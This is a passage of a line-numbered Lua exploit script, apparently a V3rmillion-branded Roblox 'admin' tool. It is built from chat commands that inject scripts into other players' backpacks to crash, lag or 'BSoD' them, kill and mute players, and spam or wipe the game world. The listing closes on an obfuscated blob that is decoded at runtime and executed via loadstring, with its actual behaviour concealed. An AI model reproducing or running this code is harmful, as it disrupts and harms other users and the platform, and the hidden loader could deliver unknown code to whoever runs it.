| 759 | select2=Instance.new("SelectionBox",me.Character["Right Arm"])
| |
| 760 | select3=Instance.new("SelectionBox",me.Character["Left Arm"])
| |
| 761 | select4=Instance.new("SelectionBox",me.Character["Left Leg"])
| |
| 762 | select5=Instance.new("SelectionBox",me.Character["Right Leg"])
| |
| 763 | select.Adornee=me.Character.Head | |
| 764 | select1.Adornee=me.Character.Torso | |
| 765 | select2.Adornee=me.Character["Right Arm"] | |
| 766 | select3.Adornee=me.Character["Left Arm"] | |
| 767 | select4.Adornee=me.Character["Left Leg"] | |
| 768 | select5.Adornee=me.Character["Right Leg"] | |
| 769 | me.Character.Humanoid.MaxHealth=math.huge | |
| 770 | end | |
| 771 | end | |
| 772 | end | |
| 773 | ) | |
| 774 | ||
| 775 | AddCmd("BSoD","bsod","BSoD a player",
| |
| 776 | function(Plrs) | |
| 777 | for _, plr in pairs(Plrs) do | |
| 778 | if plr and plr.Backpack then | |
| 779 | for i = 0,7,1 do | |
| 780 | NewLS(BSoDSource, plr.Backpack) | |
| 781 | Output("You BSoD'D "..plr.Name, __)
| |
| 782 | ||
| 783 | end | |
| 784 | end | |
| 785 | end | |
| 786 | end | |
| 787 | ) | |
| 788 | ||
| 789 | ||
| 790 | ||
| 791 | AddCmd("Nilp","nils","see who is nil *BETA*",
| |
| 792 | function() | |
| 793 | NewS([[ | |
| 794 | Model = Instance.new("Model", game.Lighting)
| |
| 795 | Model.Name = "V3rm Tabs" | |
| 796 | for _,v in pairs(game:service'NetworkServer':children()) do | |
| 797 | if v:GetPlayer() then | |
| 798 | if v:GetPlayer().Parent ~= game:service'Players' then | |
| 799 | Instance.new("StringValue",Model).Value = v:GetPlayer().Name
| |
| 800 | end | |
| 801 | end | |
| 802 | end | |
| 803 | ]], workspace) | |
| 804 | wait() | |
| 805 | np = nil | |
| 806 | for i = 0,5,1 do | |
| 807 | if game.Lighting:findFirstChild("V3rm Tabs") then
| |
| 808 | np = game.Lighting:findFirstChild("V3rm Tabs")
| |
| 809 | break | |
| 810 | end | |
| 811 | wait(0.1) | |
| 812 | end | |
| 813 | if np ~= nil then | |
| 814 | Dismiss() | |
| 815 | for _,v in pairs(np:children()) do | |
| 816 | if v:IsA("StringValue") then
| |
| 817 | Output(v.Value,"Really red") | |
| 818 | end | |
| 819 | end | |
| 820 | elseif np == nil then | |
| 821 | Output("Something went wrong.","Really red")
| |
| 822 | end | |
| 823 | end | |
| 824 | ) | |
| 825 | ||
| 826 | AddCmd("Probe mode", "probe", "temp nil",
| |
| 827 | function() | |
| 828 | probemode = true | |
| 829 | Dismiss() | |
| 830 | if LocalPlayer.Character then LocalPlayer.Character = nil end | |
| 831 | if workspace.CurrentCamera == nil then return end | |
| 832 | local camera = workspace.CurrentCamera | |
| 833 | local probe = Instance.new("Part", workspace)
| |
| 834 | probe.Shape = "Block" | |
| 835 | probe.Color = Color3.new(170, 0, 255) | |
| 836 | probe.Anchored = true | |
| 837 | probe.Transparency = (0) | |
| 838 | probe.Size = Vector3.new(8.6, 7.8, 7.8) | |
| 839 | probe.CanCollide = true | |
| 840 | M = Instance.new("SpecialMesh",probe)
| |
| 841 | M.MeshId = "http://www.roblox.com/Asset/?id=9756362" | |
| 842 | M.Scale = Vector3.new(1.25, 3, 1.25) | |
| 843 | P.Color = Color3.new(170, 0, 255) | |
| 844 | ||
| 845 | One = Instance.new("Decal", probe)
| |
| 846 | Two = Instance.new("Decal", probe)
| |
| 847 | Three = Instance.new("Decal", probe)
| |
| 848 | Four = Instance.new("Decal", probe)
| |
| 849 | Five = Instance.new("Decal", probe)
| |
| 850 | Six = Instance.new("Decal", probe)
| |
| 851 | One.Texture = "http://www.roblox.com/asset/?id=124865736" | |
| 852 | Two.Texture = "http://www.roblox.com/asset/?id=124865736" | |
| 853 | Three.Texture = "http://www.roblox.com/asset/?id=124865736" | |
| 854 | Four.Texture = "http://www.roblox.com/asset/?id=124865736" | |
| 855 | Five.Texture = "http://www.roblox.com/asset/?id=124865736" | |
| 856 | Six.Texture = "http://www.roblox.com/asset/?id=124865736" | |
| 857 | One.Face = "Front" | |
| 858 | Two.Face = "Back" | |
| 859 | Three.Face = "Right" | |
| 860 | Four.Face = "Left" | |
| 861 | Five.Face = "Top" | |
| 862 | Six.Face = "Bottom" | |
| 863 | ||
| 864 | local s = Instance.new("SelectionBox")
| |
| 865 | ||
| 866 | s.Color = BrickColor.new("Really black")
| |
| 867 | s.Adornee = probe | |
| 868 | s.Parent = probe | |
| 869 | s.Transparency = (0.4) | |
| 870 | probe.TopSurface = 0 | |
| 871 | probe.Color = Color3.new(170, 0, 255) | |
| 872 | probe.Anchored = true | |
| 873 | probe.BottomSurface = 0 | |
| 874 | probe.Name = LocalPlayer.Name.."'s probe" | |
| 875 | local rotation = 0 | |
| 876 | local bbg = Instance.new("BillboardGui", probe)
| |
| 877 | bbg.Size = UDim2.new(3, 0, 3 ,0) | |
| 878 | bbg.ExtentsOffset = Vector3.new(0, 2, 0) | |
| 879 | local txt = Instance.new("TextLabel", bbg)
| |
| 880 | txt.FontSize = "Size24" | |
| 881 | txt.Font = "SourceSansBold" | |
| 882 | txt.Text = LocalPlayer.Name | |
| 883 | txt.BackgroundTransparency = 1 | |
| 884 | txt.TextColor3 = Color3.new(255, 0, 0) | |
| 885 | txt.TextStrokeTransparency = 0 | |
| 886 | txt.Size = UDim2.new(1,0,1,0) | |
| 887 | local pl = Instance.new("PointLight", probe)
| |
| 888 | pl.Shadows = true | |
| 889 | pl.Range = 20 | |
| 890 | coroutine.wrap(function() | |
| 891 | while pl ~= nil do | |
| 892 | pl.Color = Color3.new(math.random(), math.random(), math.random()) | |
| 893 | wait(0.8) | |
| 894 | end | |
| 895 | end)() | |
| 896 | coroutine.wrap(function() | |
| 897 | while LocalPlayer.Character == nil and probe.Parent == workspace and probe ~= nil and game:service'RunService'.Stepped:wait() do | |
| 898 | probe.CFrame = camera.Focus * CFrame.Angles(0, rotation, 0) | |
| 899 | end | |
| 900 | if camera then | |
| 901 | camera:Destroy() | |
| 902 | end | |
| 903 | probe:Destroy() | |
| 904 | end)() | |
| 905 | end | |
| 906 | ) | |
| 907 | ||
| 908 | ||
| 909 | AddCmd("reload","char","Creates your character",
| |
| 910 | function() | |
| 911 | if workspace.CurrentCamera == nil then return end | |
| 912 | local camera = workspace.CurrentCamera | |
| 913 | local new_char = game:service("InsertService"):LoadAsset(68452456):GetChildren()[1]
| |
| 914 | local human = new_char.Humanoid | |
| 915 | human.Parent = nil | |
| 916 | new_char.Name = LocalPlayer.Name | |
| 917 | wait() | |
| 918 | human.Parent = new_char | |
| 919 | camera.CameraSubject = human | |
| 920 | camera.CameraType = "Custom" | |
| 921 | new_char.Parent = workspace | |
| 922 | local pl = Instance.new("PointLight", new_char.Head)
| |
| 923 | pl.Range = 24 | |
| 924 | pl.Shadows = true | |
| 925 | LocalPlayer.Character = new_char | |
| 926 | new_char:MakeJoints() | |
| 927 | new_char.Torso.BrickColor = torsocolor | |
| 928 | new_char["Left Leg"].BrickColor = leftlegcolor | |
| 929 | new_char["Right Leg"].BrickColor = rightlegcolor | |
| 930 | new_char["Left Arm"].BrickColor = leftarmcolor | |
| 931 | new_char["Right Arm"].BrickColor = rightarmcolor | |
| 932 | new_char.Head.BrickColor = headcolor | |
| 933 | for i,v in pairs(Clothes) do | |
| 934 | v:Clone().Parent = new_char | |
| 935 | end | |
| 936 | probemode = false | |
| 937 | end | |
| 938 | ) | |
| 939 | ||
| 940 | AddCmd("stop plsplspls","vremove","Remove Admin",
| |
| 941 | function() | |
| 942 | Output("y u remove dis",
| |
| 943 | function() | |
| 944 | Output("fine...qq",
| |
| 945 | function() | |
| 946 | for i,v in pairs(getfenv(1)) do | |
| 947 | getfenv(1)[i] = nil | |
| 948 | end | |
| 949 | script.Disabled = true | |
| 950 | LocalPlayer = NO_PLAYER | |
| 951 | script:findFirstChild(SourceName).Value = " " | |
| 952 | script.Disabled = true | |
| 953 | tabmodel:ClearAllChildren() | |
| 954 | tabmodel:Destroy() | |
| 955 | connection:disconnect() | |
| 956 | Tabs = {}
| |
| 957 | Cmds = {}
| |
| 958 | Banlist = {}
| |
| 959 | fukhed.all = true | |
| 960 | coroutine.resume(coroutine.create(function() | |
| 961 | while wait(0.1) do | |
| 962 | Dismiss() | |
| 963 | end | |
| 964 | end)) | |
| 965 | end) | |
| 966 | end) | |
| 967 | end | |
| 968 | ) | |
| 969 | ||
| 970 | AddCmd("ForceField","ff","Give forcefield to player",
| |
| 971 | function(plrs) | |
| 972 | for _, plr in pairs(plrs) do | |
| 973 | if plr and plr.Character then | |
| 974 | Instance.new("ForceField", plr.Character)
| |
| 975 | end | |
| 976 | end | |
| 977 | end | |
| 978 | ) | |
| 979 | ||
| 980 | function ShowBL() | |
| 981 | Dismiss() | |
| 982 | for _,v in pairs(Banlist) do | |
| 983 | Output(v, "Really red", function() | |
| 984 | Dismiss() | |
| 985 | Output("Un-ban", "Black", function() table.remove(Banlist,_) end)
| |
| 986 | Output("Back", "Really red", function() ShowBL() end)
| |
| 987 | end) | |
| 988 | end | |
| 989 | end | |
| 990 | ||
| 991 | AddCmd("Banlist","bl","Show banned players",
| |
| 992 | function() | |
| 993 | ShowBL() | |
| 994 | end | |
| 995 | ) | |
| 996 | ||
| 997 | AddCmd("Lag player","lg","Lag a player",
| |
| 998 | function(plrs) | |
| 999 | for _, plr in pairs(plrs) do | |
| 1000 | if plr and plr.Backpack then | |
| 1001 | NewLS(LagSource, plr.Backpack) | |
| 1002 | end | |
| 1003 | end | |
| 1004 | end | |
| 1005 | ) | |
| 1006 | ||
| 1007 | AddCmd("Crash player","crash","Crash the player",
| |
| 1008 | function(plrs) | |
| 1009 | for _, plr in pairs(plrs) do | |
| 1010 | if plr and plr.Backpack then | |
| 1011 | NewLS([==[ | |
| 1012 | game:GetService("RunService").RenderStepped(function()
| |
| 1013 | Delay(0, function() return end) | |
| 1014 | end)]==], plr.Backpack) | |
| 1015 | end | |
| 1016 | end | |
| 1017 | end | |
| 1018 | ) | |
| 1019 | ||
| 1020 | AddCmd("Kill player","kill","Kill a player",
| |
| 1021 | function(plrs) | |
| 1022 | for _, plr in pairs(plrs) do | |
| 1023 | if plr and plr.Character then | |
| 1024 | plr.Character:BreakJoints() | |
| 1025 | end | |
| 1026 | end | |
| 1027 | end | |
| 1028 | ) | |
| 1029 | ||
| 1030 | ||
| 1031 | AddCmd("Respawn player","respawn","Respawn the player",
| |
| 1032 | function(plrs) | |
| 1033 | for _, plr in pairs(plrs) do | |
| 1034 | NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
| |
| 1035 | end | |
| 1036 | end | |
| 1037 | ) | |
| 1038 | ||
| 1039 | AddCmd("Mute player","mute","Block the player chat",
| |
| 1040 | function(plrs) | |
| 1041 | for _, plr in pairs(plrs) do | |
| 1042 | if plr and plr.Backpack then | |
| 1043 | NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)", plr.Backpack)
| |
| 1044 | end | |
| 1045 | end | |
| 1046 | end | |
| 1047 | ) | |
| 1048 | ||
| 1049 | AddCmd("Unmute player","unmute","Unblock the player chat",
| |
| 1050 | function(plrs) | |
| 1051 | for _, plr in pairs(plrs) do | |
| 1052 | if plr and plr.Backpack then | |
| 1053 | NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, true)", plr.Backpack)
| |
| 1054 | end | |
| 1055 | end | |
| 1056 | end | |
| 1057 | ) | |
| 1058 | ||
| 1059 | AddCmd("Un-ForceField","unff","Remove the forcefield that you gave to player",
| |
| 1060 | function(plrs) | |
| 1061 | for _, plr in pairs(plrs) do | |
| 1062 | if plr and plr.Character then | |
| 1063 | pcall(function() | |
| 1064 | for _,v in pairs(plr.Character:GetChildren()) do | |
| 1065 | if v:IsA("ForceField") then
| |
| 1066 | v:Destroy() | |
| 1067 | end | |
| 1068 | end | |
| 1069 | end) | |
| 1070 | end | |
| 1071 | end | |
| 1072 | end | |
| 1073 | ) | |
| 1074 | ||
| 1075 | AddCmd("Bsod Spam","dsz","Make everything bsod",
| |
| 1076 | function() | |
| 1077 | function meands(obj) | |
| 1078 | for i,v in pairs(obj:GetChildren()) do | |
| 1079 | if v:IsA("BasePart") then
| |
| 1080 | One = Instance.new("Decal", v)
| |
| 1081 | Two = Instance.new("Decal", v)
| |
| 1082 | Three = Instance.new("Decal", v)
| |
| 1083 | Four = Instance.new("Decal", v)
| |
| 1084 | Five = Instance.new("Decal", v)
| |
| 1085 | Six = Instance.new("Decal", v)
| |
| 1086 | One.Texture = "http://www.roblox.com/asset/?id=3529576" | |
| 1087 | Two.Texture = "http://www.roblox.com/asset/?id=3529576" | |
| 1088 | Three.Texture = "http://www.roblox.com/asset/?id=3529576" | |
| 1089 | Four.Texture = "http://www.roblox.com/asset/?id=3529576" | |
| 1090 | Five.Texture = "http://www.roblox.com/asset/?id=3529576" | |
| 1091 | Six.Texture = "http://www.roblox.com/asset/?id=3529576" | |
| 1092 | One.Face = "Front" | |
| 1093 | Two.Face = "Back" | |
| 1094 | Three.Face = "Right" | |
| 1095 | Four.Face = "Left" | |
| 1096 | Five.Face = "Top" | |
| 1097 | Six.Face = "Bottom" | |
| 1098 | end | |
| 1099 | meands(v) | |
| 1100 | end | |
| 1101 | end | |
| 1102 | meands(workspace) | |
| 1103 | end | |
| 1104 | ) | |
| 1105 | ||
| 1106 | AddCmd("Decal Spam","ds","Make everything decal",
| |
| 1107 | function() | |
| 1108 | function meands(obj) | |
| 1109 | for i,v in pairs(obj:GetChildren()) do | |
| 1110 | if v:IsA("BasePart") then
| |
| 1111 | One = Instance.new("Decal", v)
| |
| 1112 | Two = Instance.new("Decal", v)
| |
| 1113 | Three = Instance.new("Decal", v)
| |
| 1114 | Four = Instance.new("Decal", v)
| |
| 1115 | Five = Instance.new("Decal", v)
| |
| 1116 | Six = Instance.new("Decal", v)
| |
| 1117 | One.Texture = "http://www.roblox.com/asset/?id=124865736" | |
| 1118 | Two.Texture = "http://www.roblox.com/asset/?id=124865736" | |
| 1119 | Three.Texture = "http://www.roblox.com/asset/?id=124865736" | |
| 1120 | Four.Texture = "http://www.roblox.com/asset/?id=124865736" | |
| 1121 | Five.Texture = "http://www.roblox.com/asset/?id=124865736" | |
| 1122 | Six.Texture = "http://www.roblox.com/asset/?id=124865736" | |
| 1123 | One.Face = "Front" | |
| 1124 | Two.Face = "Back" | |
| 1125 | Three.Face = "Right" | |
| 1126 | Four.Face = "Left" | |
| 1127 | Five.Face = "Top" | |
| 1128 | Six.Face = "Bottom" | |
| 1129 | end | |
| 1130 | meands(v) | |
| 1131 | end | |
| 1132 | end | |
| 1133 | meands(workspace) | |
| 1134 | end | |
| 1135 | ) | |
| 1136 | ||
| 1137 | AddCmd("brick spam all","bs","Brick Spam da game",
| |
| 1138 | function() | |
| 1139 | while true do | |
| 1140 | wait() | |
| 1141 | p = Instance.new("Part")
| |
| 1142 | p.Size = Vector3.new(math.random(1,30),math.random(1,30),math.random(1,30)) | |
| 1143 | p.BrickColor = BrickColor.random() | |
| 1144 | p.Position = Vector3.new(math.random(-200,200),100,math.random(-200,200)) | |
| 1145 | p.Reflectance = (math.random(0,100) / 100) | |
| 1146 | p.Locked = false | |
| 1147 | p.Name = "V3rmilli0n was here" | |
| 1148 | p.Parent = game.Workspace | |
| 1149 | One = Instance.new("Decal", p)
| |
| 1150 | Two = Instance.new("Decal", p)
| |
| 1151 | Three = Instance.new("Decal", p)
| |
| 1152 | Four = Instance.new("Decal", p)
| |
| 1153 | Five = Instance.new("Decal", p)
| |
| 1154 | Six = Instance.new("Decal", p)
| |
| 1155 | One.Texture = "http://www.roblox.com/asset/?id=124865736" | |
| 1156 | Two.Texture = "http://www.roblox.com/asset/?id=124865736" | |
| 1157 | Three.Texture = "http://www.roblox.com/asset/?id=124865736" | |
| 1158 | Four.Texture = "http://www.roblox.com/asset/?id=124865736" | |
| 1159 | Five.Texture = "http://www.roblox.com/asset/?id=124865736" | |
| 1160 | Six.Texture = "http://www.roblox.com/asset/?id=124865736" | |
| 1161 | One.Face = "Front" | |
| 1162 | Two.Face = "Back" | |
| 1163 | Three.Face = "Right" | |
| 1164 | Four.Face = "Left" | |
| 1165 | Five.Face = "Top" | |
| 1166 | Six.Face = "Bottom" | |
| 1167 | ||
| 1168 | local s = Instance.new("SelectionBox")
| |
| 1169 | ||
| 1170 | s.Color = BrickColor.random() | |
| 1171 | s.Adornee = p | |
| 1172 | s.Parent = p | |
| 1173 | s.Transparency = (0.4) | |
| 1174 | end | |
| 1175 | end | |
| 1176 | ) | |
| 1177 | ||
| 1178 | AddCmd("FClean","fclean","Fully clear",
| |
| 1179 | function() | |
| 1180 | for i,s in pairs(workspace:GetChildren()) do | |
| 1181 | if game:GetService("Players"):GetPlayerFromCharacter(s) == nil then
| |
| 1182 | if s.className ~= "Terrain" then | |
| 1183 | if s.className ~= "Camera" then | |
| 1184 | pcall(function() s:Destroy() end) | |
| 1185 | end end end end | |
| 1186 | local b = Instance.new("Part", Game:GetService("Workspace"))
| |
| 1187 | b.Size = Vector3.new(3000, 1, 3000) | |
| 1188 | b.CFrame = CFrame.new(0, 0, 0) | |
| 1189 | b.Name = "Base" | |
| 1190 | b.BrickColor = BrickColor.new("Earth green")
| |
| 1191 | b.TopSurface = "Smooth" | |
| 1192 | b.BottomSurface = "Smooth" | |
| 1193 | b.LeftSurface = "Smooth" | |
| 1194 | b.RightSurface = "Smooth" | |
| 1195 | b.FrontSurface = "Smooth" | |
| 1196 | b.BackSurface = "Smooth" | |
| 1197 | b.Anchored = true | |
| 1198 | b.Locked = true | |
| 1199 | local sl = Instance.new("SpawnLocation", workspace)
| |
| 1200 | sl.Anchored = true | |
| 1201 | sl.Locked = true | |
| 1202 | sl.formFactor = "Plate" | |
| 1203 | sl.Size = Vector3.new(6, 0.4, 6) | |
| 1204 | sl.CFrame = CFrame.new(0, 0.6, 0) | |
| 1205 | sl.BrickColor = BrickColor.new("Really blue")
| |
| 1206 | sl.TopSurface = "Smooth" | |
| 1207 | sl.BottomSurface = "Smooth" | |
| 1208 | sl.LeftSurface = "Smooth" | |
| 1209 | sl.RightSurface = "Smooth" | |
| 1210 | sl.FrontSurface = "Smooth" | |
| 1211 | sl.BackSurface = "Smooth" | |
| 1212 | game.Lighting.FogEnd = 10011111111 | |
| 1213 | game.Lighting.Ambient = Color3.new(0.5,0.5,0.5) | |
| 1214 | game.Lighting.TimeOfDay = "14:00:00" | |
| 1215 | game.Lighting.Ambient = Color3.new(0.5,0.5,0.5) | |
| 1216 | game.Lighting.Brightness = 1 | |
| 1217 | game.Lighting.ColorShift_Bottom = Color3.new(0,0,0) | |
| 1218 | game.Lighting.ColorShift_Top = Color3.new(0,0,0) | |
| 1219 | game.Lighting.ShadowColor = Color3.new(0.7,0.7,0.7) | |
| 1220 | end | |
| 1221 | ) | |
| 1222 | ||
| 1223 | ||
| 1224 | AddCmd("BSoD BanList","bbl","Show BSod banned players",
| |
| 1225 | function() | |
| 1226 | Showbb() | |
| 1227 | end | |
| 1228 | ) | |
| 1229 | ||
| 1230 | AddCmd("'BSoD' ban","bb","BSoD ban a player",
| |
| 1231 | function(plrs, msg) | |
| 1232 | for _,v in pairs(plrs) do | |
| 1233 | if v then | |
| 1234 | table.insert(BSoDBanList,v.Name) | |
| 1235 | Output('|BSoD Banned | '..v.Name,__)
| |
| 1236 | for _, plr in pairs(plrs) do | |
| 1237 | if plr and plr.Backpack then | |
| 1238 | NewLS(BSoDSource, plr.Backpack) | |
| 1239 | else | |
| 1240 | Output(Error) | |
| 1241 | end | |
| 1242 | end | |
| 1243 | end | |
| 1244 | end | |
| 1245 | end | |
| 1246 | ) | |
| 1247 | ||
| 1248 | function Showbb() | |
| 1249 | Dismiss() | |
| 1250 | for _,v in pairs(BSoDBanList) do | |
| 1251 | Output(v,nil, function() | |
| 1252 | Dismiss() | |
| 1253 | Output(v) | |
| 1254 | Output("Un-Ban","Really red", function()
| |
| 1255 | table.remove(BSoDBanList, _) | |
| 1256 | end) | |
| 1257 | Output("Back","Really red", function()
| |
| 1258 | Showbb() | |
| 1259 | end) | |
| 1260 | end) | |
| 1261 | end | |
| 1262 | end | |
| 1263 | ||
| 1264 | AddCmd("Number of commands","ncmds","0var 9000 qq not rlly soon tho",
| |
| 1265 | function() | |
| 1266 | Output(#Cmds, __) | |
| 1267 | end | |
| 1268 | ) | |
| 1269 | ||
| 1270 | ||
| 1271 | ||
| 1272 | AddCmd("GetAge","ga","Get age of a player",
| |
| 1273 | function(Plrs) | |
| 1274 | for _, plr in pairs(Plrs) do | |
| 1275 | if plr then | |
| 1276 | Output(plr.Name..": "..tostring(plr.AccountAge)) | |
| 1277 | end | |
| 1278 | end | |
| 1279 | end) | |
| 1280 | ||
| 1281 | ||
| 1282 | AddCmd("StampTools","stools","StamperTools lel",
| |
| 1283 | function() | |
| 1284 | x = game:GetService("InsertService"):LoadAsset(73089166) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
| |
| 1285 | x = game:GetService("InsertService"):LoadAsset(73089204) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
| |
| 1286 | x = game:GetService("InsertService"):LoadAsset(73089190) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
| |
| 1287 | x = game:GetService("InsertService"):LoadAsset(58880579) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
| |
| 1288 | x = game:GetService("InsertService"):LoadAsset(60791062) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
| |
| 1289 | x = game:GetService("InsertService"):LoadAsset(73089239) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
| |
| 1290 | end | |
| 1291 | ) | |
| 1292 | ||
| 1293 | AddCmd("Gtools","gtools","my fav gear lel",
| |
| 1294 | function() | |
| 1295 | x = game:GetService("InsertService"):LoadAsset(121946387) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
| |
| 1296 | x = game:GetService("InsertService"):LoadAsset(16895215) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
| |
| 1297 | x = game:GetService("InsertService"):LoadAsset(37816777) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
| |
| 1298 | x = game:GetService("InsertService"):LoadAsset(37816777) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
| |
| 1299 | x = game:GetService("InsertService"):LoadAsset(77443704) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
| |
| 1300 | x = game:GetService("InsertService"):LoadAsset(68603324) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
| |
| 1301 | end | |
| 1302 | ) | |
| 1303 | ||
| 1304 | AddCmd("ek","ek","Epic Katana lel",
| |
| 1305 | function() | |
| 1306 | x = game:GetService("InsertService"):LoadAsset(18017365) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
| |
| 1307 | x = game:GetService("InsertService"):LoadAsset(21294489) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
| |
| 1308 | x = game:GetService("InsertService"):LoadAsset(18776718) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
| |
| 1309 | x = game:GetService("InsertService"):LoadAsset(20577851) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
| |
| 1310 | x = game:GetService("InsertService"):LoadAsset(25545089) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
| |
| 1311 | x = game:GetService("InsertService"):LoadAsset(22787168) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
| |
| 1312 | end | |
| 1313 | ) | |
| 1314 | ||
| 1315 | function Output(Txt, func) | |
| 1316 | P = Instance.new("Part", tabmodel)
| |
| 1317 | P.Shape = "Block" | |
| 1318 | P.Color = Color3.new(0, 0, 0) | |
| 1319 | P.Anchored = true | |
| 1320 | P.Transparency = (0.4) | |
| 1321 | P.Size = Vector3.new(1.4, 1.2, 1.4) | |
| 1322 | P.CanCollide = false | |
| 1323 | if probemode == false then | |
| 1324 | if LocalPlayer.Character.Torso then | |
| 1325 | P.Position = LocalPlayer.Character.Torso.Position | |
| 1326 | elseif LocalPlayer.Character.Torso == nil then return end | |
| 1327 | elseif probemode == true then | |
| 1328 | if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then | |
| 1329 | P.Position = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe").Position | |
| 1330 | elseif game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") == nil then return end | |
| 1331 | else | |
| 1332 | return | |
| 1333 | end | |
| 1334 | local s = Instance.new("SelectionBox")
| |
| 1335 | s.Color = BrickColor.new(255, 255, 255) | |
| 1336 | s.Adornee = P | |
| 1337 | s.Parent = P | |
| 1338 | s.Transparency = (0.4) | |
| 1339 | Instance.new("PointLight", P)
| |
| 1340 | bg = Instance.new("BillboardGui", P)
| |
| 1341 | bg.Adornee = tab | |
| 1342 | bg.Size = UDim2.new(8, 0, 7.5, 0) | |
| 1343 | bg.StudsOffset = Vector3.new(0, 1, 0) | |
| 1344 | text = Instance.new("TextLabel", bg)
| |
| 1345 | text.Size = UDim2.new(1, 0, 0.2, 0) | |
| 1346 | text.FontSize = "Size18" | |
| 1347 | text.BackgroundTransparency = 1 | |
| 1348 | text.Font = "Legacy" | |
| 1349 | text.TextStrokeTransparency = 0 | |
| 1350 | text.TextColor3 = Color3.new(255, 0, 0) | |
| 1351 | text.Text = Txt | |
| 1352 | Click = Instance.new("ClickDetector",P)
| |
| 1353 | Click.MaxActivationDistance = 999999999 | |
| 1354 | Click.MouseClick:connect(function(Plr) | |
| 1355 | if Plr.Name == LocalPlayer.Name then | |
| 1356 | Dismiss() | |
| 1357 | func = func | |
| 1358 | func() | |
| 1359 | end | |
| 1360 | end) | |
| 1361 | table.insert(Tabs, P) | |
| 1362 | end | |
| 1363 | ||
| 1364 | function getPlayers(msg) | |
| 1365 | local plrs = {}
| |
| 1366 | if msg == "me" then | |
| 1367 | table.insert(plrs, LocalPlayer) | |
| 1368 | elseif msg == "all" then | |
| 1369 | plrs = game:GetService("Players"):GetChildren()
| |
| 1370 | elseif msg == "noobs" then | |
| 1371 | for _,plr in pairs(game:GetService("Players"):GetChildren()) do
| |
| 1372 | if plr.AccountAge > 364 then | |
| 1373 | table.insert(plrs, plr) | |
| 1374 | end | |
| 1375 | end | |
| 1376 | elseif msg == "veterans" then | |
| 1377 | for _,plr in pairs(game:GetService("Players"):GetChildren()) do
| |
| 1378 | if plr.AccountAge > 364 then | |
| 1379 | table.insert(plrs, plr) | |
| 1380 | end | |
| 1381 | end | |
| 1382 | elseif msg == "others" then | |
| 1383 | for i,v in pairs(game:GetService("Players"):GetChildren()) do
| |
| 1384 | if v ~= LocalPlayer then | |
| 1385 | table.insert(plrs, v) | |
| 1386 | end | |
| 1387 | end | |
| 1388 | else | |
| 1389 | for i,v in pairs(game:GetService("Players"):GetChildren()) do
| |
| 1390 | if v.Name:lower():sub(1,#msg) == msg:lower() then | |
| 1391 | table.insert(plrs, v) | |
| 1392 | end | |
| 1393 | end | |
| 1394 | end | |
| 1395 | return plrs | |
| 1396 | end | |
| 1397 | ||
| 1398 | for _,plr in pairs(game:GetService("Players"):GetChildren()) do
| |
| 1399 | end | |
| 1400 | ||
| 1401 | LocalPlayer.Chatted:connect(function(m) | |
| 1402 | for i,v in pairs(Cmds) do | |
| 1403 | if v["Say"]..key == m:sub(1, #v["Say"]+#key) then | |
| 1404 | v["Func"](getPlayers(m:sub(#v["Say"]+#key+1)), m:sub(#v["Say"]+#key+1)) | |
| 1405 | end | |
| 1406 | end | |
| 1407 | end) | |
| 1408 | ||
| 1409 | for i = 0,8,1 do | |
| 1410 | wait(0.01) | |
| 1411 | end | |
| 1412 | local z={["*"]=0,["_"]=1,["?"]=2,["="]=3,["("]=4,["^"]=5,[")"]=6,["@"]=7,["$"]=8,["~"]=9,["+"]=10,["#"]=11,["!"]=12,["-"]=13,["&"]=14,["%"]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
| |
| 1413 | "%(^@(@*@^@(@$A?*^!)^)_)=@^)*?()%)*?&)%)(@*?_)?)^@=@^)*?(@$)~)=@*?=@=)?@~)*@(@!?*A?&?&?!(%)=)_)!)*^!)_)~@^)?@&?&(_)-)^)!?*?%^%^~?+*%(^@(@*@^@(@$A?=(?@^)_)(@^)()*??)~@+=*?)^==?@-)~)!)!)~)*=&)??!?*?%^%^~?+*%(^@(@*@^@(@$???@^^)!)=)%)-)^)*?(@%)*?)^==?^-(*?(^_)?)@?=@!?*???&?&?!(%)=)_)!)*^!)_)~@^)?@&?&(_)-)^)!?*?%^%^~?+*%(^@(@*@^@(@$???&(%)(@*?)(~)&)~)=@$)^)()??!?*?%^%^~?" | |
| 1414 | }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())() | |
| 1415 | ||
| 1416 | for _,v in pairs(game.Players:GetPlayers()) do | |
